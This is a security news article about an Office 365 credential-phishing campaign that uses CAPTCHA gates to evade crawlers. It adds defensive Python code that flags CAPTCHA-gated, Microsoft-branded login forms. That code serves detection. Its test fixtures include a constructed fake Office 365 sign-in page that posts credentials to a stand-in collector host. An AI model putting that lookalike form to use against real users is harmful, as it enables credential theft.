Another phishing campaign using evasive techniques is in the wild. The new campaign, which targets Microsoft Office 365 credentials, hides its phishing pages behind CAPTCHAs to keep automated crawlers away from them.
Microsoft Office 365 Phishing Campaign Exploiting CAPTCHAs
Researchers from Menlo Threat Labs at Menlo Security have discovered a new phishing campaign in the wild. The campaign aims to steal the credentials of Microsoft Office 365 users.
As described in their blog post, the attack proceeds like any other phishing campaign, luring the victim to fake pages. Here, the attackers mimic the Microsoft Office 365 sign-in page to deceive users and steal their credentials.
What sets this campaign apart, however, is its use of legitimate CAPTCHAs.
After redirecting the target user to the phishing page, the attack first requires the user to solve a CAPTCHA. With this additional step, the attackers ensure that a human is interacting with the page and keep out automated security tools that fetch and analyze links. At the same time, the trick makes the victim trust that the phishing page is legitimate.
As stated in their post,
Two important things are happening here. The first is that the user is made to think that this is a legitimate site, because their cognitive bias has trained them to believe that checks like these appear only on benign websites. The second thing this strategy does is to defeat automated crawling systems attempting to identify phishing attacks.
In this campaign, the victim has to solve at least three or four CAPTCHA images before landing on the actual phishing page.
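The mechanism above turns a normal crawler's behaviour against it: a URL scanner that stops at the first CAPTCHA never sees the credential form behind it. The following is an added example, not code from the Menlo Security post or from this article, of the opposite approach that a link-scanning pipeline can take: record a CAPTCHA gate on a host that is not one of Microsoft's real sign-in hosts as a signal in its own right, keep walking the chain of pages a victim would see, and score the branded credential form at the end. The hostnames, the page HTML and the allowlist of legitimate login hosts are constructed assumptions for illustration.

```python
"""Heuristic scoring of a CAPTCHA-gated credential page (added example).

The pages and hostnames below are constructed for illustration; the allowlist
of legitimate Microsoft sign-in hosts is an assumption to adapt to your tenant.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts where a Microsoft sign-in page legitimately lives (assumed allowlist).
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}
# Substrings that identify common CAPTCHA widgets in script/iframe sources or class names.
CAPTCHA_HINTS = ("recaptcha", "hcaptcha", "captcha")
# Brand wording that a lookalike sign-in page typically carries.
BRAND_WORDS = ("office 365", "microsoft", "outlook", "sign in to your account")


class PageFeatures(HTMLParser):
    """Extracts the handful of page features the heuristic needs."""

    def __init__(self):
        super().__init__()
        self.has_captcha = False
        self.has_password_field = False
        self.form_actions = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "div", "iframe"):
            blob = " ".join(filter(None, (a.get("src"), a.get("class")))).lower()
            if any(h in blob for h in CAPTCHA_HINTS):
                self.has_captcha = True
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        if tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_data(self, data):
        self.text.append(data.lower())


def analyze(url, html):
    """Score one fetched page; returns features plus a verdict and its reasons."""
    host = urlparse(url).hostname or ""
    f = PageFeatures()
    f.feed(html)
    brand = any(w in " ".join(f.text) for w in BRAND_WORDS)
    legit_host = host in LEGIT_LOGIN_HOSTS
    reasons = []
    # A CAPTCHA in front of a lookalike sign-in flow is the evasion technique itself.
    if f.has_captcha and not legit_host:
        reasons.append("captcha gate on non-Microsoft host")
    if f.has_password_field and brand and not legit_host:
        reasons.append("Microsoft-branded password form on non-Microsoft host")
    # Credentials posted to a host other than the page's own or Microsoft's.
    for action in f.form_actions:
        ah = urlparse(action).hostname
        if ah and ah != host and ah not in LEGIT_LOGIN_HOSTS:
            reasons.append(f"credentials posted to third-party host {ah}")
    return {
        "host": host,
        "captcha": f.has_captcha,
        "password_field": f.has_password_field,
        "verdict": "phishing-suspect" if reasons else "no-finding",
        "reasons": reasons,
    }


def scan_chain(pages):
    """Walk the pages in the order a victim sees them without stopping at CAPTCHA gates."""
    gates, reasons = 0, []
    for url, html in pages:
        r = analyze(url, html)
        gates += int(r["captcha"])
        reasons.extend(r["reasons"])
    return {"captcha_gates": gates,
            "verdict": "phishing-suspect" if reasons else "no-finding",
            "reasons": reasons}


# Constructed sample pages: a CAPTCHA gate, the lookalike sign-in form behind it,
# and a benign form on a real Microsoft host for comparison.
GATE_PAGE = """<html><body><h1>Verify you are human</h1>
<script src="https://www.google.com/recaptcha/api.js"></script>
<div class="g-recaptcha" data-sitekey="constructed-key"></div></body></html>"""

LOGIN_PAGE = """<html><head><title>Sign in to your account</title></head><body>
<p>Sign in to your account - Office 365</p>
<form action="https://collector.example.net/post.php" method="post">
<input type="email" name="login"><input type="password" name="passwd">
<button>Sign in</button></form></body></html>"""

LEGIT_PAGE = """<html><head><title>Sign in to your account</title></head><body>
<p>Microsoft</p><form action="/common/login" method="post">
<input type="email" name="login"><input type="password" name="passwd"></form></body></html>"""

PHISH_CHAIN = [("https://o365-verify.example.com/step%d" % i, GATE_PAGE) for i in range(1, 4)]
PHISH_CHAIN.append(("https://o365-verify.example.com/login", LOGIN_PAGE))

if __name__ == "__main__":
    print(scan_chain(PHISH_CHAIN))
    print(analyze("https://login.microsoftonline.com/", LEGIT_PAGE))
```

The crawler-side lesson is in `scan_chain`: the scanner must keep following the flow after a CAPTCHA, or at least hand the URL to a human analyst, rather than treating the gate as the end of the page. For a real deployment the allowlist should come from the tenant's federation configuration, and CAPTCHA detection should be paired with screenshot or DOM similarity checks against the genuine sign-in page.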
Phishing Exploiting CAPTCHAs Isn’t New
This isn’t the first time that a phishing campaign has exploited CAPTCHAs.
Earlier this year, Microsoft warned about an Excel malware campaign that also exploited CAPTCHAs to bypass automated checks. Once the CAPTCHA was solved, the malware was quietly downloaded to the victim's device.
Users should therefore remain wary of such attacks and treat incoming email with care. However legitimate an email or a web page reached from a link in it looks, double-check its legitimacy, especially if it asks for login credentials or personal information. A CAPTCHA says nothing about whether a page is genuine; the address shown in the browser's address bar does. It is always good to contact the apparent sender through some other channel to validate the message.